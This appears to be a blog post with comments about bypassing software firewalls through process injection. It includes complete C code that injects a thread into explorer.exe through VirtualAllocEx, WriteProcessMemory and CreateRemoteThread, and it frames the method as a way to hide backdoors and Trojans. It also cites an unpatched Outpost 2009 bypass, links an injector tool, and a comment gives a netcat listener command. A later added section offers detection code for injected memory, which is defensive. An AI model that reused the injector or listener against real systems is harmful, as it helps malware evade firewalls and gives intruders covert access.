How to Bypass a Firewall with Process Injection
Posted by daphne in Exploits / BUG Decryption, Fuzzing, Pen-test Method, advisory
Hello Friends.
First question: why process injection?
With this method we can attach a malicious process to a permitted process. As you know, firewalls permit certain processes, such as Internet Explorer [IE], Firefox, Windows Update and so on. These processes can [usually] connect to the Internet without any prompt.
Process injection, DLL injection and "PE injection" are methods for bypassing firewalls [these methods are known as firewall leaks].
In DLL injection we inject a DLL into an application's process space, so that the firewall believes it is the trusted application that is making the connection, when in fact it is the malicious DLL.
Today when we talk about injection, we are talking about a DLL (or code) that is loaded into a running process's memory. Windows is designed to allow this, and injection techniques can be used by any application. Some applications use it to add features to a closed-source program [for example, the Babylon dictionary is one of them].
I do not intend to talk about DLL injection in detail this time; I just want to talk about process injection [or hijacking] to bypass firewalls.
Look at the following diagrams:
[Figure: principle of application execution (default)]
[Figure: loading a dynamic library (DLL)]
[Figure: inserting malicious code into a trusted process]
[Figure: using Internet Explorer (trusted software) for injection]
[Figure: general code injection with Windows API calls such as VirtualAllocEx()]
How to inject into a process [with C code]:
For firewall bypass we have 4 steps:
- Open a target process "P"
- Allocate memory remotely in P's address space
- Copy the code into the remote process
- Create a remote thread to execute the code
[and the injection is done]
Example of process injection into EXPLORER.EXE [code]:
/* Build as a 32-bit Release binary without incremental linking: in a Debug
   build &ThreadProc points to a jump thunk rather than the function body, so
   the bytes copied below would be wrong. The target must have the same bitness. */
#undef UNICODE
#undef _UNICODE
#pragma comment(lib, "Shlwapi.lib")
#pragma comment(lib, "Advapi32.lib")
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <Shlwapi.h>
#include <tlhelp32.h>

#define INJECT_EXE "explorer.exe"

/* Typed pointers for the APIs the remote thread will call. */
typedef BOOL (WINAPI *DeleteFileA_t)(LPCSTR);
typedef VOID (WINAPI *Sleep_t)(DWORD);
typedef int  (WINAPI *MessageBoxA_t)(HWND, LPCSTR, LPCSTR, UINT);

/* Parameter block copied into the target. It carries every address and string
   the remote code needs, so ThreadProc has no imports and no relocations. */
typedef struct _RPar
{
    DeleteFileA_t pDeleteFile;
    Sleep_t       pSleep;
    MessageBoxA_t pMessageBox;
    char          Filename[1024];
    char          string1[1024];
    char          string2[1024];
} RPar;

/* Code that runs inside the target. It may touch nothing but its own locals
   and the parameter block: no globals, no string literals, no direct API calls. */
DWORD WINAPI ThreadProc(RPar *Para)
{
    Para->pMessageBox(NULL, Para->string1, Para->string2, MB_OK);
    /* Delete the injector's own executable once it has exited and the file is free. */
    while (Para->pDeleteFile(Para->Filename) == 0) {
        Para->pSleep(1000);
    }
    return 0;
}

int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
{
    DWORD dwThreadId, pID = 0, dwThreadSize = 2048;
    void *pRemoteThread;
    char ExeFile[1024];
    HANDLE hProcess, hSnap, hThread;
    HINSTANCE hKernel, hUser;
    RPar my_RPar, *pmy_RPar;
    PROCESSENTRY32 pe32 = {0};

    /* Find the PID of the trusted process by walking the process list. */
    if ((hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE)
        return 3;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    if (Process32First(hSnap, &pe32)) {
        do {
            if (StrCmpNI(INJECT_EXE, pe32.szExeFile, (int)strlen(INJECT_EXE)) == 0) {
                pID = pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnap, &pe32));
    }
    CloseHandle(hSnap);
    if (pID == 0)
        return 4; /* target is not running */

    /* Step 1: open the target (needs rights to read/write its memory and create threads). */
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pID);
    if (hProcess == NULL)
        return 5;

    /* Steps 2 and 3: allocate RWX memory in the target and copy ThreadProc's bytes
       into it. 2048 is an upper bound on the size of ThreadProc, not its real size. */
    pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pRemoteThread == NULL ||
        !WriteProcessMemory(hProcess, pRemoteThread, (LPCVOID)ThreadProc, dwThreadSize, 0)) {
        CloseHandle(hProcess);
        return 6;
    }

    /* Resolve the API addresses locally: kernel32 and user32 are mapped at the same
       base address in every process on the system, so they are valid in the target too. */
    ZeroMemory(&my_RPar, sizeof(RPar));
    hKernel = LoadLibrary("kernel32.dll");
    my_RPar.pDeleteFile = (DeleteFileA_t)GetProcAddress(hKernel, "DeleteFileA");
    my_RPar.pSleep      = (Sleep_t)GetProcAddress(hKernel, "Sleep");
    hUser = LoadLibrary("user32.dll");
    my_RPar.pMessageBox = (MessageBoxA_t)GetProcAddress(hUser, "MessageBoxA");
    GetModuleFileName(NULL, ExeFile, sizeof(ExeFile));
    printf("%s\n", ExeFile);
    strcpy(my_RPar.Filename, ExeFile);
    strcpy(my_RPar.string1, "HI Abysssec");
    strcpy(my_RPar.string2, "OK");

    /* Copy the parameter block into the target as well. */
    pmy_RPar = (RPar *)VirtualAllocEx(hProcess, 0, sizeof(RPar), MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hProcess, pmy_RPar, &my_RPar, sizeof my_RPar, 0);

    /* Step 4: start a thread in the target at the copied code, passing the parameter block. */
    hThread = CreateRemoteThread(hProcess, 0, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, pmy_RPar, 0, &dwThreadId);
    if (hThread)
        CloseHandle(hThread);

    FreeLibrary(hUser);
    FreeLibrary(hKernel);
    CloseHandle(hProcess);
    system("tasklist"); /* no new PID appears: the payload lives inside explorer.exe */
    return 0;
}
What happens when the firewall is bypassed?
On servers:
We can call Internet Explorer or another trusted application [with ASP.NET execute permission], inject a backdoor into it and listen on any port.
With this method we can telnet to the open port on the server without any worry.
On clients:
Backdoors, Trojans and other malicious software can connect to the Internet without being granted access.
Real-world test [discovered by Abysssec]:
Vulnerable firewall [Outpost 2009]:
http://www.agnitum.com/products/outpost/
You can inject a process into IE7 or Mozilla Firefox [trusted by default].
[Sorry, no more information: this bug is not fixed yet. You can test it with a process injector tool.]
www.tarasco.org
[pinjector.exe]:
Download link + source:
http://www.tarasco.org/security/pinjector/index.html
Final conclusions:
1- We can bypass some firewalls: those that don't check memory allocated inside a trusted process.
2- DLL, process and PE injection are useful ways to run code without creating a new process ID [PID].
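The check those firewalls skip, as an added example that is not part of the original post or of any firewall product: walk the target's address space with VirtualQueryEx and flag committed regions that are executable but not backed by a PE image on disk, which is exactly what the VirtualAllocEx(..., PAGE_EXECUTE_READWRITE) call in the injector above leaves behind. The region classifier is kept portable so it can be compiled and tested anywhere; the live scanner is Windows-only. The region table in demo_scan() is a constructed sample, not a real memory dump.

```c
/* Added example: find executable memory that the Windows loader did not map.
   The classifier is portable; scan_process() needs the Win32 API. */
#include <stdio.h>
#include <stdlib.h>
#include <stddef.h>
#include <stdint.h>
#include <stdbool.h>

#ifdef _WIN32
#include <windows.h>
#else
/* Values mirrored from <windows.h> so the classifier builds on other platforms. */
#define MEM_COMMIT              0x1000
#define MEM_RESERVE             0x2000
#define MEM_PRIVATE             0x20000
#define MEM_MAPPED              0x40000
#define MEM_IMAGE               0x1000000
#define PAGE_READWRITE          0x04
#define PAGE_EXECUTE            0x10
#define PAGE_EXECUTE_READ       0x20
#define PAGE_EXECUTE_READWRITE  0x40
#define PAGE_EXECUTE_WRITECOPY  0x80
#define PAGE_GUARD              0x100
#endif

/* The three MEMORY_BASIC_INFORMATION fields the check needs. */
typedef struct {
    uint32_t state;   /* MEM_COMMIT, MEM_RESERVE or MEM_FREE */
    uint32_t protect; /* PAGE_* flags, possibly with PAGE_GUARD/PAGE_NOCACHE or'ed in */
    uint32_t type;    /* MEM_IMAGE, MEM_MAPPED or MEM_PRIVATE */
} region_t;

/* Executable regardless of modifier bits such as PAGE_GUARD. */
bool region_is_executable(uint32_t protect)
{
    switch (protect & 0xFF) {
    case PAGE_EXECUTE: case PAGE_EXECUTE_READ:
    case PAGE_EXECUTE_READWRITE: case PAGE_EXECUTE_WRITECOPY:
        return true;
    default:
        return false;
    }
}

/* Legitimate code lives in MEM_IMAGE regions (a PE file mapped by the loader).
   Committed executable memory of any other type was created at run time by
   VirtualAlloc(Ex) or a section mapping, which is what an injector leaves behind. */
bool region_is_suspicious(const region_t *r)
{
    return r->state == MEM_COMMIT && r->type != MEM_IMAGE && region_is_executable(r->protect);
}

size_t count_suspicious(const region_t *regions, size_t n)
{
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        if (region_is_suspicious(&regions[i]))
            hits++;
    return hits;
}

/* Constructed sample (an assumption, not a real dump) of what a region walk of
   a browser carrying the injected ThreadProc from the post might return. */
size_t demo_scan(void)
{
    const region_t regions[] = {
        { MEM_COMMIT,  PAGE_EXECUTE_READ,            MEM_IMAGE   }, /* iexplore.exe .text      */
        { MEM_COMMIT,  PAGE_READWRITE,               MEM_PRIVATE }, /* heap                     */
        { MEM_COMMIT,  PAGE_READWRITE | PAGE_GUARD,  MEM_PRIVATE }, /* stack guard page         */
        { MEM_RESERVE, 0,                            MEM_PRIVATE }, /* reserved, not committed  */
        { MEM_COMMIT,  PAGE_EXECUTE_READWRITE,       MEM_PRIVATE }, /* injected ThreadProc copy */
        { MEM_COMMIT,  PAGE_EXECUTE_READ,            MEM_MAPPED  }, /* executable section, no PE */
    };
    return count_suspicious(regions, sizeof regions / sizeof regions[0]);
}

#ifdef _WIN32
/* Walk a live process and print every region the classifier flags. */
int scan_process(DWORD pid)
{
    HANDLE h = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    if (h == NULL) { fprintf(stderr, "OpenProcess(%lu) failed: %lu\n", pid, GetLastError()); return -1; }
    MEMORY_BASIC_INFORMATION mbi;
    unsigned char *addr = NULL;
    int hits = 0;
    while (VirtualQueryEx(h, addr, &mbi, sizeof mbi) == sizeof mbi) {
        region_t r = { (uint32_t)mbi.State, (uint32_t)mbi.Protect, (uint32_t)mbi.Type };
        if (region_is_suspicious(&r)) {
            printf("%p size=0x%llx protect=0x%lx type=0x%lx\n", mbi.BaseAddress,
                   (unsigned long long)mbi.RegionSize, mbi.Protect, mbi.Type);
            hits++;
        }
        addr = (unsigned char *)mbi.BaseAddress + mbi.RegionSize;
    }
    CloseHandle(h);
    return hits;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <pid>\n", argv[0]); return 1; }
    int hits = scan_process((DWORD)strtoul(argv[1], NULL, 10));
    printf("%d non-image executable region(s)\n", hits);
    return hits > 0 ? 2 : 0;
}
#endif
```

Run it against the explorer.exe PID before and after the injector above and the 2048-byte PAGE_EXECUTE_READWRITE region shows up as a hit. Treat the result as a heuristic, not proof: JIT engines in browsers and .NET also create private executable memory, so a firewall or HIPS doing this check has to whitelist those or correlate with the CreateRemoteThread event.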
In the future:
1- Using these methods to bypass other protections [hybrid or free protection software]
2- PE injection: why, what, where!?
More information:
http://www.tarasco.org/security/pinjector/Win32.Design.Flaws.pdf
http://www.firewallleaktester.com/docs/leaktest.pdf
http://www.bluenotch.com/files/Shewmaker-DLL-Injection.pdf
————————————————————————————–
Happy New Year and happy holidays
Godspeed
Daphne
Hi
Usually firewalls have the ability to detect process memory modification and injection!!!
And about this code you ripped, I think WriteProcessMemory and some other API functions need permission to succeed!
And finally, is this post about bypassing SOFTWARE firewalls? It seems to be about some basics of thread or process injection... (sorry for my horrible English)
———————————————–
Daphne says:
Hmm, thank you for your attention.
For example, OUTPOST 2009 (software firewall = personal firewall) keeps a custom trusted list of processes for each user.
This post talks about a vulnerability in some software firewalls, not all.
What you say is true of server firewalls (such as BlackICE).
Thanks,
Daphne
Um, you think the inability to detect process injection is a vulnerability!?!?! I think this is a characteristic of firewalls...
Can you write into process memory without permissions? You need permission to write into the memory of any process, trusted or untrusted!
If the firewalls you are talking about leave the "trusted list of processes" free to do everything they want, then that becomes a vuln (maybe)!
And my other question is still open.
And if you have this permission, why bypass anything? You can make a port listen or do whatever you want...
—————————————————
Daphne says:
Hmm. Please read this article:
http://www.firewallleaktester.com/docs/leaktest.pdf
For your problem: yes, you can!
The IExplorer.exe process runs with Guest privileges, and you can inject your process at Guest level, not higher!
OK, when running a process by default: you can run netcat.exe -v -l -p 123, but the firewall won't permit your process to access the Internet or intranet.
Please test it.
Thanks.
daphne